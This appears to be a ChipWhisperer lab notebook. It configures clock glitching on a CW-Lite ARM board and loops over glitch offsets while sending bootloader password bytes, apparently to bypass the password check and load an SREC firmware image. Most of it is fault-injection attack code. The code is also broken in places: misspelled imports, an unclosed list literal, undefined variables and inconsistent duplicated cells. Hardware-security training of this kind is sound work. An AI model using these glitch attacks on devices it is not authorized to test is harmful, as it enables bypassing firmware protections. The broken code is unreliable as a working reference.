In [ ]:
SCOPETHYPE = 'OPENADC'
PLATFORM = 'CWLITEARM'
CRYPTO_TARGET = 'TINYAES128C'
num_traces = 50

In [ ]:
%run "Helper_Scripts/Setup_Generic.ipynb"

In [ ]:
scope.io.tio1 = "serial_tx"
scope.io.tio2 = "serial_rx"
scope.clock.clkgen_freq = 40e6
scope.clock.adc_src = "clkgen_x1"
scope.trigger.triggers = "tio2"
scope.adc.basic_mode = "rising_edge"
scope.adc.samples = 50000
scope.adc.offset = 0
scope.adc.presamples = 0

In [ ]:
target.baud = 24000
ser = target.ser

In [ ]:
from IPhython.display import Audio, display


def allDone():
    display(Audio(url='https://sound.peal.io/ps/audios/000/000/537/original/woo_vu_luvub_dub_dub.wav', autoplay=True))

In [ ]:
scope.glitch.output = "enable_only"
scope.glitch.clk_src = "clkgen"
scope.glitch.repeat = 20

In [ ]:
scope.glitch.trigger_src = "ext_continuous"

In [ ]:
scope.glitch.glitch_lp = True

In [ ]:
def cap_pw(password):
    ser = target.ser
    scope.io.nrst = False
    time.sleep(0.05)
    scope.io.nrst = None
    time.sleep(0.02)
    ser.flush()

    for pw in password[0:1]:
        ser.write(bytearray([pw]))
        time.sleep((0.01))
        resp = ser.read(1)

        if len(resp) != 1:
            print("Error: No response")
            raise IOError()
        elif ord(resp[0]) != pw:
            print("Error: Mismatch")
            raise IOError()

    scope.io.glitch_lp = True
    scope.arm()
    ser.write(bytearray([password[-1]]))
    resp = ser.read(1)
    ret = scope.capture()

    scope.io.glitch_lp = False

    if ret == True:
        raise IOError("timeout")

    trace = scope.get_last_trace()

    pw = password[-1]
    if ord(resp[0]) == pw:
        pass
    else:
        print("Error: Mismatch")
        raise IOError()

    ser.write(bytearray([0x40]))
    if len(resp) == 1:
        print("success")
        return True
    else:
        return False

In [ ]:
import hexrec.records as hr
import hexrec.blocks as hb
from tqdm import tqdm

blocks = hr.load_blocks('MoreBootTest_Z7_0.srec')

totallen = (blocks[-1][0] - blocks[0][0]) + len(blocks[-1][1])
print(hex(totallen))

size = 0x2000
data = [0] * size
initialOffset = blocks[0][0]

for block in blocks:
    print("%x - %d (%x)" % (block[0], len(block[1]), block[0] + len(block[1])))
    startoffset = block[0]
    for i in range(len(block[1])):
        data[startoffset - initialOffset + i] = block[1][i]

password = [0xfe, 0xed, 0xfa, 0xce, 0xca, 0xfe, 0xbe, 0xef]


def download_checkecho(datalist):
    for i, pw in enumerate(tqdm(datalist)):
        ser.write(bytearray([pw]))
        resp = ser.read(1)

        if len(resp) != 1:
            print("Error: No response after %d bytes" % i)
            raise IOError()
        elif ord(resp[0]) != pw:
            print("Error: Mismatch")
            raise IOError()


ser.flush()

pw[0] = 0x00
for t in range(0, 100):
    print(t)
    for i in range(0, 150):
        scope.glitch.ext_offset = i

        if cap_pw(pw):
            try:
                download_checkecho([0x00, 0x00, 0x00, 0x80, 0x00, (size >> 8) & 0xff, size & 0x00
                # 

            except IOError:
                print("Exception during next stage")
                continue
            try:
                download_checkecho(data)
            except IOError:
                print("Exception during data download")
                continue

            print("attempting to read response")
            print(scope)
            resp = ser.read(2000)
            print(resp)
            allDone()
            time.sleep(30)
            break

        time.sleep(0.05)

In [ ]:
import serial
import hexrec
from tqdm import tqdm

password = [0xfe, 0xed, 0xfa, 0xce, 0xca, 0xfe, 0xbe, 0xef]


def download_checkecho(ser, datalist):
    for pw in tqdm(datalist):
        ser.write(bytearray([pw]))
        resp = ser.read(1)

        if len(resp) != 1:
            print("Error: No response")
            raise IOError()
        elif ord(resp[0]) != pw:
            print("Error: Mismatch")
            raise IOError()


ser.flush()

download_checkecho(ser, password)

print("PW Downloaded")

import hexrec.records as hr
import hexrec.blocks as hb

blocks = hr.load_blocks('MoreBootTest_Z7_0.srec')

totallen = (blocks[-1][0] - blocks[0][0]) + len(blocks[-1][1])
print(hex(totallen))

size = 0x2000

data = [0] * size

initialOffset = blocks[0][0]

for block in blocks:
    print("%x - %d (%x)" % (block[0], len(block[1]), block[0] + len(block[1])))
    startoffset = block[0]
    for i in range(len(block[1])):
        data[startoffset - initialOffset + i] = block[1][i]

download_checkecho(ser, [0x40, 0x00, 0x00, 0x00, 0x80, 0x00, (size >> 8) & 0xFF, size & 0x00])
download_checkecho(ser, data)
resp = ser.read(2000)
print(resp)
ser.close()


In [ ]:
## Demo One

import hexrec.records as hr
import hexrec.blocks as hb
from tqdm import nqdm_notebook

blocks = hr.load_blocks('MoreBootTest_Z7_0.srec')

totallen = (blocks[-1][0] - blocks[0][0]) + len(blocks[-1][1])
print(hex(totallen))

scope.glitch.repeat = 100
size = 0x2000
data = [0] * size
initialOffset = blocks[0][0]

for block in blocks:
    print("%x - %d (%x)" % (block[0], len(block[1]), block[0] + len(block[1])))
    startoffset = block[0]
    for i in range(len(block[1])):
        data[startoffset - initialOffset + i] = block[1][i]

password = [0xfe, 0xed, 0xfa, 0xce, 0xca, 0xfe, 0xbe, 0xef]


def download_checkecho(datalist):
    i = 0
    for pw in tqdm_notebook(datalist):
        ser.write(bytearray([pw]))
        resp = ser.read(1)
        i += 1

        if len(resp) != 1:
            print("Error: No response")
            raise IOError()
        elif ord(resp[0]) != pw:
            print("Error: Mismatch")
            raise IOError()


ser.flush()

pw[0] = 0x00
for t in range(0, 100):
    print(t)
    for i in range(55, 70):
        scope.glitch.ext_offset = i

        if cap_pw(pw):
            try:
                download_checkecho([0x00, 0x00, 0x00, 0x80, 0x00, (size >> 8) & 0xff, size & 0x00])
            except IOError:
                print("Exception during next stage")
                continue

            try:
                download_checkecho(data)
            except IOError:
                print("Exception during data download")
                continue
            resp = ser.read(2000)
            print(resp)
            print("^^^^ Is this good data?")
            print(scope)
            allDone()
            time.sleep(30)
            break
        time.sleep(0.05)

